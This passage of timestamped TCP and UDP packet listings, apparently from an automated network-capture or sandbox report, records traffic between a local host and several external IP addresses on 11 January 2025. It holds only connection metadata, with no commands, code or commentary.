                                                                                                                                                                  Jan 11, 2025 07:55:16.331299067 CET4436288013.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:16.332304001 CET4436288013.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:16.332809925 CET62880443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:16.332950115 CET62880443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:16.332950115 CET62880443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:16.332983971 CET4436288013.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:16.333013058 CET4436288013.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:16.333018064 CET62880443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:16.333091021 CET62880443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:16.333097935 CET4436288013.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:16.374233007 CET4436288013.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:16.380052090 CET62880443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:16.614804029 CET4436288013.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:16.614933014 CET4436288013.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:16.615108967 CET62880443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:16.615267992 CET62880443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:16.615267992 CET62880443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:16.615309000 CET4436288013.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:16.615560055 CET62880443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:17.034305096 CET4976780192.168.11.20160.202.165.71
                                                                                                                                                                  Jan 11, 2025 07:55:17.152667046 CET8049767160.202.165.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:18.891515970 CET64605443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:18.891603947 CET4436460513.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:18.891789913 CET64605443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:18.891988039 CET64605443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:18.892040968 CET4436460513.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:19.296869040 CET4436460513.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:19.297241926 CET64605443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:19.297257900 CET4436460513.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:19.297671080 CET4436460513.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:19.298188925 CET64605443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:19.298280954 CET4436460513.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:19.298305035 CET64605443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:19.298305035 CET64605443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:19.298332930 CET64605443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:19.298333883 CET4436460513.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:19.298386097 CET4436460513.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:19.298417091 CET64605443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:19.298432112 CET4436460513.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:19.340127945 CET64605443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:19.402951002 CET61086443192.168.11.20204.79.197.219
                                                                                                                                                                  Jan 11, 2025 07:55:19.402951956 CET53380443192.168.11.20204.79.197.219
                                                                                                                                                                  Jan 11, 2025 07:55:19.402973890 CET44361086204.79.197.219192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:19.402977943 CET44353380204.79.197.219192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:19.555624962 CET4436460513.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:19.555715084 CET4436460513.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:19.555861950 CET64605443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:19.556091070 CET64605443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:19.556117058 CET4436460513.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:21.659077883 CET5716180192.168.11.2094.23.158.211
                                                                                                                                                                  Jan 11, 2025 07:55:21.877638102 CET54228443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:21.877682924 CET4435422813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:21.877912998 CET54228443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:21.878076077 CET54228443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:21.878093958 CET4435422813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:22.325582027 CET4435422813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:22.326006889 CET54228443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:22.326029062 CET4435422813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:22.326781988 CET4435422813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:22.327167034 CET54228443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:22.327264071 CET54228443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:22.327281952 CET4435422813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:22.327313900 CET54228443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:22.327363014 CET54228443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:22.327414989 CET4435422813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:22.381257057 CET54228443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:22.615642071 CET4435422813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:22.615763903 CET4435422813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:22.615979910 CET54228443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:22.616086006 CET54228443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:22.616086960 CET54228443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:22.616120100 CET4435422813.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:22.616322041 CET54228443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:55:27.170094967 CET4976780192.168.11.20160.202.165.71
                                                                                                                                                                  Jan 11, 2025 07:55:27.241173029 CET8049767160.202.165.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:27.241348982 CET4976780192.168.11.20160.202.165.71
                                                                                                                                                                  Jan 11, 2025 07:55:27.288575888 CET8049767160.202.165.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:27.794380903 CET5422980192.168.11.2094.23.158.211
                                                                                                                                                                  Jan 11, 2025 07:55:28.402390957 CET53302443192.168.11.20162.159.61.3
                                                                                                                                                                  Jan 11, 2025 07:55:28.402420044 CET44353302162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:28.803951025 CET5422980192.168.11.2094.23.158.211
                                                                                                                                                                  Jan 11, 2025 07:55:30.805653095 CET5422980192.168.11.2094.23.158.211
                                                                                                                                                                  Jan 11, 2025 07:55:32.529673100 CET61267443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:55:32.529783964 CET44361267204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:32.529856920 CET58604443192.168.11.2023.33.85.243
                                                                                                                                                                  Jan 11, 2025 07:55:32.529906034 CET4435860423.33.85.243192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:32.530029058 CET44361267204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:32.530061007 CET58604443192.168.11.2023.33.85.243
                                                                                                                                                                  Jan 11, 2025 07:55:32.530092955 CET61267443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:55:32.530175924 CET61267443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:55:32.530405998 CET58604443192.168.11.2023.33.85.243
                                                                                                                                                                  Jan 11, 2025 07:55:32.530433893 CET4435860423.33.85.243192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:32.776329041 CET4435860423.33.85.243192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:32.776741982 CET58604443192.168.11.2023.33.85.243
                                                                                                                                                                  Jan 11, 2025 07:55:32.776772022 CET4435860423.33.85.243192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:32.777703047 CET4435860423.33.85.243192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:32.778249979 CET58604443192.168.11.2023.33.85.243
                                                                                                                                                                  Jan 11, 2025 07:55:32.778301954 CET58604443192.168.11.2023.33.85.243
                                                                                                                                                                  Jan 11, 2025 07:55:32.778526068 CET4435860423.33.85.243192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:32.824327946 CET58604443192.168.11.2023.33.85.243
                                                                                                                                                                  Jan 11, 2025 07:55:33.016813993 CET4435860423.33.85.243192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:33.016921043 CET4435860423.33.85.243192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:33.017226934 CET58604443192.168.11.2023.33.85.243
                                                                                                                                                                  Jan 11, 2025 07:55:33.017275095 CET58604443192.168.11.2023.33.85.243
                                                                                                                                                                  Jan 11, 2025 07:55:33.017299891 CET4435860423.33.85.243192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:33.017323971 CET58604443192.168.11.2023.33.85.243
                                                                                                                                                                  Jan 11, 2025 07:55:33.017513037 CET58604443192.168.11.2023.33.85.243
                                                                                                                                                                  Jan 11, 2025 07:55:34.809094906 CET5422980192.168.11.2094.23.158.211
                                                                                                                                                                  Jan 11, 2025 07:55:37.296488047 CET4976780192.168.11.20160.202.165.71
                                                                                                                                                                  Jan 11, 2025 07:55:37.414993048 CET8049767160.202.165.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:42.821763039 CET5422980192.168.11.2094.23.158.211
                                                                                                                                                                  Jan 11, 2025 07:55:47.429500103 CET4976780192.168.11.20160.202.165.71
                                                                                                                                                                  Jan 11, 2025 07:55:47.469105005 CET8049767160.202.165.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:55:47.469372988 CET4976780192.168.11.20160.202.165.71
                                                                                                                                                                  Jan 11, 2025 07:55:47.547983885 CET8049767160.202.165.71192.168.11.20

                                                                                                                                                                  UDP Packets

                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                  Jan 11, 2025 07:53:32.191569090 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                  Jan 11, 2025 07:53:32.944653988 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                  Jan 11, 2025 07:53:33.710176945 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                  Jan 11, 2025 07:53:42.897854090 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                  Jan 11, 2025 07:53:43.654203892 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                  Jan 11, 2025 07:53:44.419641018 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                  Jan 11, 2025 07:53:47.680308104 CET5023953192.168.11.201.1.1.1
                                                                                                                                                                  Jan 11, 2025 07:53:48.081686974 CET53502391.1.1.1192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:02.868016958 CET6420353192.168.11.201.1.1.1
                                                                                                                                                                  Jan 11, 2025 07:54:03.064366102 CET53642031.1.1.1192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:05.437623978 CET5082353192.168.11.201.1.1.1
                                                                                                                                                                  Jan 11, 2025 07:54:05.557204008 CET53508231.1.1.1192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:06.327403069 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                  Jan 11, 2025 07:54:07.086657047 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                  Jan 11, 2025 07:54:07.852020979 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                  Jan 11, 2025 07:54:13.799091101 CET6245653192.168.11.201.1.1.1
                                                                                                                                                                  Jan 11, 2025 07:54:13.918184042 CET53624561.1.1.1192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:16.107064962 CET6245750001192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:16.107110977 CET1764033477192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:16.107111931 CET71553111192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:16.108141899 CET6245850002192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:16.108303070 CET148542634192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:16.108303070 CET6202759920192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:16.109719038 CET6245950003192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:16.109719038 CET260137752192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:16.109870911 CET5408948989192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:18.117129087 CET6158550001192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:18.117129087 CET737747040192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:18.117155075 CET6490454420192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:18.118849039 CET6158650002192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:18.118849039 CET3834920161192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:18.118925095 CET6057561926192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:18.120443106 CET6158750003192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:18.120562077 CET1804952184192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:18.120562077 CET4073213721192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:19.133917093 CET6158850001192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:19.133917093 CET4622421944192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:19.134079933 CET5310642390192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:19.137054920 CET6158950002192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:19.137054920 CET89042248192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:19.137145042 CET2204824514192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:19.139725924 CET6159050003192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:19.139725924 CET1099833302192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:19.139816999 CET4319564521192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:20.149228096 CET5117850001192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:20.149228096 CET4565733973192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:20.149285078 CET5170050515192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:20.152287006 CET5117950002192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:20.152287006 CET2209738827192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:20.152376890 CET6461948040192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:20.155180931 CET5118050003192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:20.155180931 CET4828153006192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:20.155246019 CET5892831029192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:21.163273096 CET4962050001192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:21.163273096 CET3007713072192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:21.163325071 CET5405219385192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:21.164773941 CET4962150002192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:21.164886951 CET2733824937192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:21.164886951 CET6165346615192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:21.166316986 CET4962250003192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:21.166316986 CET4178559766192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:21.166501045 CET511929658192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:22.178709984 CET4962350001192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:22.178709984 CET39383579192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:22.178761005 CET4796010455192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:22.180267096 CET4962450002192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:22.180267096 CET5929363434192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:22.180357933 CET2264310484192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:22.181791067 CET4962550003192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:22.181791067 CET3382235087192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:22.181879044 CET5162512635192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:23.194847107 CET4962650001192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:23.194848061 CET948638139192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:23.194931984 CET574516415192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:23.196481943 CET4962750002192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:23.196481943 CET2063510074192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:23.196568966 CET612155150192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:23.198054075 CET4962850003192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:23.198143005 CET6324241602192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:23.198143005 CET1657625226192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:24.209619045 CET4962950001192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:24.209619999 CET2361547297192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:24.209753036 CET5010821789192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:24.211132050 CET4963050002192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:24.211132050 CET588410570192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:24.211226940 CET15517696192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:24.212640047 CET4963150003192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:24.212640047 CET197943606192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:24.212729931 CET399741891192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:25.224936962 CET5196850001192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:25.224936962 CET366984253192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:25.224936962 CET104512551192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:25.226387978 CET5196950002192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:25.226589918 CET4621725615192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:25.226589918 CET3676723986192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:25.227936983 CET5197050003192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:25.227936983 CET6503751024192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:25.228097916 CET5837632261192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:26.240291119 CET6187250001192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:26.240291119 CET888630886192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:26.240345001 CET644371993192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:26.241862059 CET6187350002192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:26.241862059 CET5149762837192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:26.241919994 CET258091790192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:26.243415117 CET6187450003192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:26.243415117 CET2733036340192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:26.243486881 CET164913276192.168.11.20239.255.102.18
                                                                                                                                                                  Jan 11, 2025 07:54:28.429814100 CET565531900192.168.11.20239.255.255.250
                                                                                                                                                                  Jan 11, 2025 07:54:29.430246115 CET565531900192.168.11.20239.255.255.250
                                                                                                                                                                  Jan 11, 2025 07:54:30.431087971 CET565531900192.168.11.20239.255.255.250
                                                                                                                                                                  Jan 11, 2025 07:54:31.153624058 CET62708443192.168.11.20162.159.61.3
                                                                                                                                                                  Jan 11, 2025 07:54:31.227150917 CET64981443192.168.11.20162.159.61.3
                                                                                                                                                                  Jan 11, 2025 07:54:31.275532007 CET44362708162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.275752068 CET44362708162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.275788069 CET44362708162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.276262999 CET62708443192.168.11.20162.159.61.3
                                                                                                                                                                  Jan 11, 2025 07:54:31.282010078 CET62708443192.168.11.20162.159.61.3
                                                                                                                                                                  Jan 11, 2025 07:54:31.282057047 CET62708443192.168.11.20162.159.61.3
                                                                                                                                                                  Jan 11, 2025 07:54:31.282294035 CET62708443192.168.11.20162.159.61.3
                                                                                                                                                                  Jan 11, 2025 07:54:31.347278118 CET44364981162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.347317934 CET44364981162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.347434998 CET44364981162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.347882032 CET64981443192.168.11.20162.159.61.3
                                                                                                                                                                  Jan 11, 2025 07:54:31.353631973 CET62708443192.168.11.20162.159.61.3
                                                                                                                                                                  Jan 11, 2025 07:54:31.361170053 CET64981443192.168.11.20162.159.61.3
                                                                                                                                                                  Jan 11, 2025 07:54:31.361215115 CET64981443192.168.11.20162.159.61.3
                                                                                                                                                                  Jan 11, 2025 07:54:31.361341000 CET64981443192.168.11.20162.159.61.3
                                                                                                                                                                  Jan 11, 2025 07:54:31.401539087 CET44362708162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.401570082 CET44362708162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.401592016 CET44362708162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.401634932 CET44362708162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.401654959 CET44362708162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.402014971 CET62708443192.168.11.20162.159.61.3
                                                                                                                                                                  Jan 11, 2025 07:54:31.402014971 CET62708443192.168.11.20162.159.61.3
                                                                                                                                                                  Jan 11, 2025 07:54:31.402163982 CET44362708162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.403654099 CET44362708162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.430496931 CET62708443192.168.11.20162.159.61.3
                                                                                                                                                                  Jan 11, 2025 07:54:31.433598042 CET565531900192.168.11.20239.255.255.250
                                                                                                                                                                  Jan 11, 2025 07:54:31.474104881 CET44362708162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.475297928 CET44362708162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.475987911 CET61038443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.476156950 CET50687443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.480092049 CET44364981162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.480123043 CET44364981162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.480417013 CET64981443192.168.11.20162.159.61.3
                                                                                                                                                                  Jan 11, 2025 07:54:31.480714083 CET44364981162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.480745077 CET44364981162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.481098890 CET64981443192.168.11.20162.159.61.3
                                                                                                                                                                  Jan 11, 2025 07:54:31.482171059 CET44364981162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.501296997 CET62708443192.168.11.20162.159.61.3
                                                                                                                                                                  Jan 11, 2025 07:54:31.509274006 CET64981443192.168.11.20162.159.61.3
                                                                                                                                                                  Jan 11, 2025 07:54:31.521449089 CET44362708162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.549197912 CET62708443192.168.11.20162.159.61.3
                                                                                                                                                                  Jan 11, 2025 07:54:31.596036911 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.596101046 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.596276045 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.596299887 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.596555948 CET61038443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.598012924 CET61038443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.598095894 CET4435068723.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.598248959 CET4435068723.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.598474979 CET4435068723.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.598498106 CET4435068723.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.598797083 CET50687443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.599689007 CET44364981162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.600052118 CET50687443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.614972115 CET61038443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.615067959 CET61038443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.615282059 CET50687443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.615282059 CET50687443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.615437031 CET61038443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.615437031 CET61038443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.615473986 CET61038443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.615547895 CET50687443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.625982046 CET64981443192.168.11.20162.159.61.3
                                                                                                                                                                  Jan 11, 2025 07:54:31.733666897 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.733882904 CET4436103823.45.46.202192.168.11.20
